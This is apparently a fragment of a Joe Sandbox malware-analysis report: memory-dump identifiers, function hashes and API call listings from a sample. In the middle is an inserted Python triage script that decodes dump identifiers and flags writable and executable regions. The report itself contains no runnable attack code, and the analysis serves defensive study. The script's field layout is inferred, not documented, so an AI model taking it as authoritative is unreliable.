                          • Opcode ID: 5c663a0e199ca78dd3e5d8ddeedb4072658cd8facd057271914736968a3163a3
                          • Instruction ID: 229f16dbde5122fa47556162f0cc41ce8d36295dc631e561f720852bf474be8a
                          • Opcode Fuzzy Hash: 5c663a0e199ca78dd3e5d8ddeedb4072658cd8facd057271914736968a3163a3
                          • Instruction Fuzzy Hash: 286136B254C609DBD304BF18D8445BEBBE5FB84321F22493EE9C687A00E6395C52DB87
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: edcbe6dfae43a2ea236fa9af29d90a841bb8dd58fa3d415dac2ee6716606715b
                          • Instruction ID: 175727633cbb994aad7ebefbc70e3866e136c3416efd783e5f35fbf554b7a390
                          • Opcode Fuzzy Hash: edcbe6dfae43a2ea236fa9af29d90a841bb8dd58fa3d415dac2ee6716606715b
                          • Instruction Fuzzy Hash: 015135F3A183088FF3056969EC8977AB7D6DBC4720F1A853D9B8487784FC79580582CA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5dcafdb62090acb10235bdbca7212be01fcdefc6ae4458fb516600f2e0b02e61
                          • Instruction ID: ee36f70369e0df1b8a8b47d7e1993e9178aa4d2538123e599bb84d08a7f14f26
                          • Opcode Fuzzy Hash: 5dcafdb62090acb10235bdbca7212be01fcdefc6ae4458fb516600f2e0b02e61
                          • Instruction Fuzzy Hash: 2C5108F3F186184BE3146D6DEC883AAB6C6DBD4320F1B463DDEC887784E979490646C2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3907be89a13336c82756b884287e8f1d856a18eadacc0e71122fba15711c4cb9
                          • Instruction ID: 65d38c8aa594f9d9729053c9ff20e39fdb7b3d5226fadad7b92f7e6cb1065835
                          • Opcode Fuzzy Hash: 3907be89a13336c82756b884287e8f1d856a18eadacc0e71122fba15711c4cb9
                          • Instruction Fuzzy Hash: 685116B3A0C2105FF708A938EC5977BB3D9DBC4730F15C63EEA81C7784E96498058296
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6e5da48ac0a59c278373dde98a5b4aed9931b3fef1f87304fbf5316f867e6049
                          • Instruction ID: 33b5d1bb368609daa97c730d3780928c82bca4b23100207d405860fc137ab283
                          • Opcode Fuzzy Hash: 6e5da48ac0a59c278373dde98a5b4aed9931b3fef1f87304fbf5316f867e6049
                          • Instruction Fuzzy Hash: 865115F3E086009BF3186A29DC91779B6D5EB94320F2B463DEBC9837C0E9395C058286
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 796145fc6bd362f6c2307c251ced9c9aedffa3dc91f30e68a7266634a0c25ede
                          • Instruction ID: 7085a730caaf13235e38a29716bc3ed17a11469b6ff3ef80ccd35b01794c6019
                          • Opcode Fuzzy Hash: 796145fc6bd362f6c2307c251ced9c9aedffa3dc91f30e68a7266634a0c25ede
                          • Instruction Fuzzy Hash: 604149F3B182005BF7086E39DC8577ABBD5EBC4724F2A463DE6C5C3380E93558058291
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3d3c5a419c10ca8240b571a4fa4e6956effca1f12b92b07ba77fb5dca85f16ca
                          • Instruction ID: 20c1a42d5edca0f024edf89116e838ec754670baf0b29b07cc95095818f28c2a
                          • Opcode Fuzzy Hash: 3d3c5a419c10ca8240b571a4fa4e6956effca1f12b92b07ba77fb5dca85f16ca
                          • Instruction Fuzzy Hash: 2C4126F3A042048FF3449E2CDC45776B6DADBD4720F2A863DDAD4D7788E93999098286
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1d201f6fb1bee0414a12cc6d648bd12aa77b7eeaee5ce3d0d4ed21975b51d19f
                          • Instruction ID: 37ae95eb4c44d1e476c2ae179446cb8c7fc61ace6a86a21da3c56a5c11a7d230
                          • Opcode Fuzzy Hash: 1d201f6fb1bee0414a12cc6d648bd12aa77b7eeaee5ce3d0d4ed21975b51d19f
                          • Instruction Fuzzy Hash: 6551EFF3A087019BE304AE7CEC8576ABBD4EF54320F164A3DEAC5C6B40E67499408687
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5199fa38ad90878959024e70a814657c7498081e9cedb2b34b4ed4361d93118f
                          • Instruction ID: cd747bf76fbe328c63dcdc2fb72ca3781b4779f563d3152f98202605791e789d
                          • Opcode Fuzzy Hash: 5199fa38ad90878959024e70a814657c7498081e9cedb2b34b4ed4361d93118f
                          • Instruction Fuzzy Hash: C2312AF3B1C2005BE31C9E2CEC9577BB7D6EB98310F1A453CE689C3780E97999014556
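The blocks above repeat the same set of memory-dump identifiers once per function, which makes it hard to see how many distinct regions the sandbox actually captured and which ones deserve a look first. The following Python script is an added triage example, not part of the Joe Sandbox report: it pulls every distinct identifier out of a report fragment, deduplicates it, decodes the protection and type fields and lists the regions that are both writable and executable, which is where unpacked code normally ends up. The field layout (process, phase, dump id, base address, protection, type) is an assumption inferred from the values on this page: the base-address field agrees with the report's "Offset: 003A0000" image base, the protection field only takes the winnt.h PAGE_* values 0x04, 0x40 and 0x80, and the type field is always 0x01000000 (MEM_IMAGE). The sample report text is constructed from the identifiers listed above.

```python
"""Triage helper for Joe Sandbox memory-dump identifiers (added example).

Assumed field layout (inferred from this report, not documented here):
<process>.<phase>.<dump id>.<base address>.<protection>.<field 6>.<type>.<field 8>.sdmp
Only the base address, protection and type fields are decoded below.
"""
import re

# winnt.h memory-protection constants; the fifth field takes these values.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
# winnt.h memory-type constants (MEMORY_BASIC_INFORMATION.Type); seventh field.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

DUMP_ID = re.compile(
    r"\b([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp\b"
)

# Constructed sample: two function blocks' worth of identifiers copied from the report
# above; the second block repeats regions already seen in the first.
SAMPLE_REPORT = """\
Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
Source File: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
"""


def parse_dump_id(text):
    """Return the first dump identifier in `text` as a dict, or None if there is none."""
    m = DUMP_ID.search(text)
    if m is None:
        return None
    return {
        "raw": m.group(0),
        "process": int(m.group(1), 16),
        "phase": int(m.group(2), 16),
        "dump_id": int(m.group(3)),
        "base": int(m.group(4), 16),
        "protect": int(m.group(5), 16),
        "type": int(m.group(7), 16),
    }


def collect_regions(report_text):
    """Every distinct identifier in the report, sorted by base address.
    The same region is listed once per function block, so deduplicate on the raw id."""
    seen = {}
    for m in DUMP_ID.finditer(report_text):
        region = parse_dump_id(m.group(0))
        seen.setdefault(region["raw"], region)
    return sorted(seen.values(), key=lambda r: r["base"])


def protection_name(value):
    """Decode a PAGE_* value; modifier bits (PAGE_GUARD, PAGE_NOCACHE, ...) are ignored."""
    return PAGE_PROTECT.get(value & 0xFF, f"0x{value:08X}")


def writable_executable(regions):
    """Bases of regions that are writable and executable at once: where a packer
    that flips section rights leaves its decoded code, and the first dumps to pull."""
    return [r["base"] for r in regions if (r["protect"] & 0xFF) in (0x40, 0x80)]


def summarize(report_text):
    """(base, protection, type) triples for each distinct region in the report."""
    return [
        (f"{r['base']:08X}", protection_name(r["protect"]),
         MEM_TYPE.get(r["type"], f"0x{r['type']:08X}"))
        for r in collect_regions(report_text)
    ]


if __name__ == "__main__":
    for base, prot, typ in summarize(SAMPLE_REPORT):
        print(base, prot, typ)
    rwx = writable_executable(collect_regions(SAMPLE_REPORT))
    print("writable+executable:", ", ".join(f"{b:X}" for b in rwx))
```

On the sample above this yields 16 distinct regions, all MEM_IMAGE: the PE header page at 0x3A0000 and the data page at 0x5EA000 are PAGE_READWRITE, and the other fourteen are writable and executable, which is the set an analyst would load into a disassembler before anything else.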
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 25354f816d0f49f1f62c75bf2975770656ac901e55fa3134e58430fa735dd145
                          • Instruction ID: bb3804b4e8dcc11f004ec9f8896ff1790f5c4975e3e83981b494c8b2309f22d0
                          • Opcode Fuzzy Hash: 25354f816d0f49f1f62c75bf2975770656ac901e55fa3134e58430fa735dd145
                          • Instruction Fuzzy Hash: D521E0F3B083004BF704592ADCC576BB69BEBD4320F2B453EDA8487380D87D580A866A
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 003B8636
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B866D
                          • lstrcpy.KERNEL32(?,00000000), ref: 003B86AA
                          • StrStrA.SHLWAPI(?,00F2E9C8), ref: 003B86CF
                          • lstrcpyn.KERNEL32(005D93D0,?,00000000), ref: 003B86EE
                          • lstrlen.KERNEL32(?), ref: 003B8701
                          • wsprintfA.USER32 ref: 003B8711
                          • lstrcpy.KERNEL32(?,?), ref: 003B8727
                          • StrStrA.SHLWAPI(?,00F2EB48), ref: 003B8754
                          • lstrcpy.KERNEL32(?,005D93D0), ref: 003B87B4
                          • StrStrA.SHLWAPI(?,00F2EBD8), ref: 003B87E1
                          • lstrcpyn.KERNEL32(005D93D0,?,00000000), ref: 003B8800
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                          • String ID: %s%s
                          • API String ID: 2672039231-3252725368
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A1F9F
                          • lstrlen.KERNEL32(00F290B8), ref: 003A1FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 003A1FE3
                          • lstrlen.KERNEL32(003D1794), ref: 003A1FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A200E
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A2042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A204D
                          • lstrlen.KERNEL32(003D1794), ref: 003A2058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2075
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A2081
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A20AC
                          • lstrlen.KERNEL32(?), ref: 003A20E4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2104
                          • lstrcat.KERNEL32(00000000,?), ref: 003A2112
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2139
                          • lstrlen.KERNEL32(003D1794), ref: 003A214B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A216B
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A2177
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A219D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A21A8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A21D4
                          • lstrlen.KERNEL32(?), ref: 003A21EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A220A
                          • lstrcat.KERNEL32(00000000,?), ref: 003A2218
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2242
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A227F
                          • lstrlen.KERNEL32(00F2D6C0), ref: 003A228D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A22B1
                          • lstrcat.KERNEL32(00000000,00F2D6C0), ref: 003A22B9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A22F7
                          • lstrcat.KERNEL32(00000000), ref: 003A2304
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A232D
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003A2356
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2382
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A23BF
